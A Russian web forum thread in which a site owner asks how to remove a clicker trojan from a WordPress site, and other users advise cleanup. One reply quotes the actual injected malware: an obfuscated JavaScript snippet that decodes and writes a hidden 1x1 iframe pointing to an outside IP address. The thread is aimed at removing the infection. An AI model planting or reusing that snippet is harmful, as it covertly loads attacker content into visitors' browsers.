X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Помогите удалить вирус с сайта?, движок wordpress
serbboy
serbboy
Topic Starter сообщение 13.10.2009, 11:11; Ответить: serbboy
Сообщение #1


Бывалый
****

Группа: User
Сообщений: 268
Регистрация: 26.8.2009
Поблагодарили: 41 раз
Репутация:   7  


Короче говоря Касперский не пускает меня на сайт, (www.bboy.su) так как сайт заражён троян кликером. Помогите пожалуйста, как найти и удалить вирус?


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
alexa
alexa
сообщение 13.10.2009, 11:16; Ответить: alexa
Сообщение #2


Оптимизатор-Программист
******

Группа: Active User
Сообщений: 1507
Регистрация: 6.2.2008
Поблагодарили: 198 раз
Репутация:   54  


антивир доктор в ЛС smile.gif, как берёш меняеш пароли к фтп, ставиш антивир , чистиш комп, идёш на сайт, ищещ вир он там закодирован, восновном идёт как ифрейм, удаляеш его со всех файлов, или восстановил бекап сайта и вуаля

Сообщение отредактировал alexa - 13.10.2009, 11:16


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Mike_spo
Mike_spo
сообщение 13.10.2009, 11:16; Ответить: Mike_spo
Сообщение #3


Частый гость
**

Группа: User
Сообщений: 59
Регистрация: 21.12.2008
Поблагодарили: 19 раз
Репутация:   3  


(serbboy @ 13.10.2009, 11:11) *
Короче говоря Касперский не пускает меня на сайт, (www.bboy.su) так как сайт заражён троян кликером. Помогите пожалуйста, как найти и удалить вирус?

В исходном коде в самом низу:
<script>var source ="=jgsbnf!xjeui>#2#!ifjhiu>#2#!cpsefs>#1#!gsbnfcpsefs>#1#!tsd>#iuuq;00299/231/337/243;:::0hfu0hp/qiq@tje>2#?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
serbboy
serbboy
Topic Starter сообщение 13.10.2009, 11:17; Ответить: serbboy
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 268
Регистрация: 26.8.2009
Поблагодарили: 41 раз
Репутация:   7  


Спасибо. Нашёл. В корневухе в index.php стёр последние 5 строчек biggrin.gif


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Чем сжимать картинки для сайта без потери качества
1st-finstep.ru - Заработок в сети и методы продвижения сайта
8 komarik_vlad 876 Вчера, 23:24
автор: komarik_vlad
Открытая тема (нет новых ответов) Увеличение посещаемости сайта (яндекс, гугл, соц сети) - реальные люди
15 SANR 917 Вчера, 22:26
автор: anchous
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыпрошу оценить юзабилити сайта
17 ДаниилЯ 1890 Вчера, 20:33
автор: alexandrrr
Открытая тема (нет новых ответов) Требуются рерайтеры для медицинского сайта
30 руб за 1000 рерайта
14 Lisel85 2702 Вчера, 19:38
автор: Lisel85
Открытая тема (нет новых ответов) GALAKSION – оптимальный вариант для монетизации вашего сайта!
23 Galaksion_Network 2430 Вчера, 19:17
автор: Galaksion_Network


 



RSS Текстовая версия Сейчас: 13.12.2017, 0:28
Дизайн